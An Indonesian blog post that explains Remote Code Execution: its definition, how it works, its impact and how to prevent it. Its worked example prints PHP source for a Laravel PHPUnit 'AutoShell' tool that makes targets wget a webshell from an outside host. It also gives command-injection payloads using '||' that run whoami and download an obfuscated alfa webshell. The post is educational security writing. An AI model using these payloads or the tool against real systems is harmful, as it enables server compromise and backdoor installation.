Hi 👋, halaman kontak kami bukan hanya pajangan :) Pastikan anda tidak menghubungi pihak palsu yg mengatasnamakan kami !!

Table of Content

Advertisement

 

Apa itu Remote Code Execution? Contoh kasus RCE, Cara Kerja, Bahaya, dan Mencegahnya

remote code execuition is rce xxe rce ssrf to rce lfi to rce laravel rce rce adalah RCE Proof of concept rce attack Remote Code Execution adalah

Remote Code Execution (RCE), atau beberapa juga yang mengenalnya termasuk sebagai Arbitrary Code Execution, adalah konsep yang menggambarkan bentuk serangan dimana penyerang dapat mengeksekusi perintah untuk pengoperasian perangkat atau komputer orang lain termasuk server sekalipun melalui LAN, WAN, atau internet.

A Monster Called Remote Code Execution (RCE) Explained

RCE terjadi ketika kode berbahaya yang tidak sengaja diunduh maupun sengaja ditanamkan oleh seseorang kepada perangkat korban secra online dengan memanfaatkan sebuah kerentanan maupun social engineering. Umumnya serangan ini terjadi pada website yang memiliki sebuah kerentanan mulai dari cacatnya kodingan, File Inclusion, IDOR, dan lain lain. 

RCE juga merupakan vulnerability yang selalu hadir pada tingkat teratas dalam kategori keamanan siber. Tidak heran jika kamu mengikuti platform bug bounty ataupun vulnerability disclosure program, kamu dapat melihat kerentanan ini dijajaran teratas sebagai critical vulnerability.

Bagaimana Cara kerja RCE Bisa Terjadi?

Eksekusi serangan RCE cukup mendasar dimisalkan dari si attacker memindai komputer di internet untuk mencari kerentanan yang diketahui yang dapat mendukung serangan yang berhasil. Setelah kerentanan yang ditargetkan diidentifikasi, attacker kemudian melakukan eksploitasi untuk mendapatkan akses. Sekarang setelah mereka masuk, mereka dapat mengeksekusi kode berbahaya untuk mencapai tujuan mereka, termasuk mengekstrak data, mengalihkan dana, melakukan pengawasan terperinci, dan mengganggu layanan. 

Kode sering disuntikkan menggunakan bahasa aplikasi yang ditargetkan. Sisi server kemudian mengeksekusinya untuk bahasa tersebut. Bahasa biasanya termasuk Python, Java, Perl, Ruby, dan PHP. Aplikasi yang secara langsung mengevaluasi input yang tidak divalidasi biasanya rentan terhadap injeksi kode. Ini adalah kasus bahwa aplikasi web publik merupakan target utama bagi pelaku ancaman.

Eksekusi kode berbahaya biasanya dilakukan dengan menggunakan perintah terminal atau mungkin skrip bash. Skrip bash adalah file teks yang berisi perintah yang biasanya digunakan pada baris perintah. Skrip Bash memungkinkan perintah yang disertakan untuk berperilaku seperti biasanya. Mereka umumnya ditambahkan dengan ".sh," tetapi ini tidak diperlukan. Setelah skrip bash dikemas, attacker kemudian memuat kode ke dalam aplikasi rentan kemudian mengeksekusinya. Atau bisa juga si aplikasi melakukan panggilan ke kernel untuk menjalankannya.

Kemungkinan Bahaya / Dampak RCE

Singkat saja, bayangkan webserver atau perangkat kamu terjangkit backdoor bisa berupa webshell, malware, bahkan hingga kemungkinan rooting server.

Contoh Kasus Remote Code Execution

Misal disini yang akan kira eksekusi adalah kerentanan pada online tools Laravel PHPunit RCE pada web web heker diluar sana.

PoC (Piye Om Carane) :

Misalkan ada web heker yang beralamatkan di https://tools.localhost/Laravel-phpunit-rce.php

<?php
include 'header.php';
?>
<?php

$shellname = $_POST['shellname'];
$url = $_POST['url'];
$foundfile = $url."/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php";
$shellfound = $url."/vendor/phpunit/phpunit/src/Util/PHP/".$shellname;
$actual_link = $_SERVER["HTTP_HOST"];

echo '<div class="page-inner">
					<div class="row">
						<div class="col-md-8">
							<div class="card">
								<div class="card-header">
									<div class="card-head-row">
										<div class="card-title">Laravel RCE AutoShell</div><br>
<form method="POST">
	<label for="URL">URL :</label><input class="form-control" type="url" name="url">
	<br>
	<label for="Shell">Nama Shell :</label><input class="form-control" type="text" name="shellname">
	<br>
	<button class="btn btn-success" type="Submit" name="AutoShell">Gass</button>
	<br>
</form>';


if(isset($_POST['AutoShell']))
{

system("curl --data \"<?system('wget https://raw.githubusercontent.com/Codename-R/407MiniShell/master/aex.php -O ".$shellname."');?>\" -X GET ".$url."/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php");

echo '<iframe src="'.$url."/vendor/phpunit/phpunit/src/Util/PHP/".$shellname.'"></iframe>'; 

 }

 
?>
	</div>
                           </div>
                        </div>
                    </div>
                 </div>
              </div>
           
<?php include 'footer.php'; ?>

Disini ada system() function buat eksekusi, sama seperti tools laravel RCE pada umumnya. Nah disini kita akan mencoba melakukan bypass pada kodingan system(blabla $variable blabla) tadi. 

Pada php ada yang namanya AND & OR disini disimbolkan && dan ||. Pada tool tersebut $variable ada di tengah, jadi kita coba pakai && ga tembus jadinya dibypass dengan || dan tereksekusi. Jadi tinggal buat payload di input urlnya seperti berikut:

https://www.||whoami||.com/

Ketika di submit muncul nama usernya. Begitupula dengan upload webshell:

https://www.||wget "https://raw.githubusercontent.com/nicolauns/alfa-shell/master/alfa-obfuscated.php" -O alfa.php||.com/

Dan berhasil summon alfa shell di https://tools.webheker.com/alfa.php

Bagaimana Cara Mencegah RCE?

RCE juga merupakan kerentanan yang lumayan sulit dihindari karena beberapa kerentanan lain juga bisa dieksploitasi lebih lanjut menjadi RCE. Namun, dengan beberapa tips berikut mungkin bisa membantu kamu untuk meminimalisir kemungkinan tereksekusi oleh kerentanan ini.

  1. Sanitasi input pengguna
  2. menerapkan perlindungan buffer overflow
  3. Lewati input yang dikontrol pengguna ke dalam panggilan balik sistem atau fungsi evaluasi
  4. Secara aktif membuat blacklist setiap karakter khusus atau nama fungsi sekaligus beberapa yang digunakan untuk bypassing
  5. Pasang Web Application Firewall (WAF)

Sekian, sedikit pembahasam mengenai Remote Code Execution. Semoga bermanfaat!

jack of all technologies, master of none.

This Content is Protected by DMCA.com

DMCA.com Protection Status




2 comments

  1. Kamu cewe?
    1. Laki
Bijaklah dalam berkomentar, jejak digital itu kejam.


image quote pre
X-PLOITECH By OZHAXID